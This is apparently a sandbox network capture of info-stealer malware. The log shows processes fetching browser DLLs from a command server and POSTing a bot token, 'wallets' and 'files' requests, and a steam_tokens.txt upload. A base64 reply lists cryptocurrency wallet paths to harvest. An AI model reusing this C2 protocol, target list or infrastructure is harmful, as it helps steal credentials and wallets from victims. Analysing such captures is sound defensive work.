Jun 27, 2024 05:59:26.984999895 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:26 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Jun 27, 2024 05:59:27.917083979 CEST	90	OUT	GET /b13597c85f807692/mozglue.dll HTTP/1.1 Host: 65.21.175.0 Cache-Control: no-cache
Jun 27, 2024 05:59:28.193764925 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:28 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Jun 27, 2024 05:59:28.645540953 CEST	91	OUT	GET /b13597c85f807692/msvcp140.dll HTTP/1.1 Host: 65.21.175.0 Cache-Control: no-cache
Jun 27, 2024 05:59:28.902337074 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:28 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Jun 27, 2024 05:59:29.298655033 CEST	87	OUT	GET /b13597c85f807692/nss3.dll HTTP/1.1 Host: 65.21.175.0 Cache-Control: no-cache
Jun 27, 2024 05:59:29.555583954 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:29 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Jun 27, 2024 05:59:31.118249893 CEST	91	OUT	GET /b13597c85f807692/softokn3.dll HTTP/1.1 Host: 65.21.175.0 Cache-Control: no-cache
Jun 27, 2024 05:59:31.375015020 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:31 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Jun 27, 2024 05:59:31.613173962 CEST	95	OUT	GET /b13597c85f807692/vcruntime140.dll HTTP/1.1 Host: 65.21.175.0 Cache-Control: no-cache
Jun 27, 2024 05:59:31.869853973 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:31 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Jun 27, 2024 05:59:32.176574945 CEST	199	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDBFCAEBFIJJKFHDAEC Host: 65.21.175.0 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Jun 27, 2024 05:59:32.547144890 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:32.734131098 CEST	465	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHI Host: 65.21.175.0 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 2d 2d 0d 0a Data Ascii: ------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="message"wallets------JJJECFIECBGDGCAAAEHI--
Jun 27, 2024 05:59:32.995129108 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
Jun 27, 2024 05:59:33.090342045 CEST	463	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH Host: 65.21.175.0 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="message"files------GCBGIIECGHCAKECAFBFH--
Jun 27, 2024 05:59:33.348277092 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:33.377237082 CEST	561	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD Host: 65.21.175.0 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="file"------FHCGCFHDHIIIDGCAAEGD--
Jun 27, 2024 05:59:33.636061907 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:33.776129961 CEST	200	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK Host: 65.21.175.0 Content-Length: 98603 Connection: Keep-Alive Cache-Control: no-cache
Jun 27, 2024 05:59:34.309411049 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Jun 27, 2024 05:59:34.392887115 CEST	468	OUT	POST /108e010e8f91c38c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD Host: 65.21.175.0 Content-Length: 270 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 66 31 66 64 32 31 65 33 63 30 64 61 64 65 62 39 34 30 31 37 36 31 36 64 32 61 63 39 35 66 32 39 66 35 33 39 39 30 31 30 38 36 65 65 39 35 66 34 32 63 31 64 37 62 32 65 63 64 65 34 31 32 32 37 63 30 62 65 38 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 46 48 44 48 49 49 49 44 47 43 41 41 45 47 44 2d 2d 0d 0a Data Ascii: ------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="token"b8f1fd21e3c0dadeb94017616d2ac95f29f539901086ee95f42c1d7b2ecde41227c0be8b------FHCGCFHDHIIIDGCAAEGDContent-Disposition: form-data; name="message"jbdtaijovg------FHCGCFHDHIIIDGCAAEGD--
Jun 27, 2024 05:59:34.652765989 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49784	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:18.142343998 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:18.821872950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:18.822788000 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:19.043395996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49785	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:18.392206907 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:19.040672064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
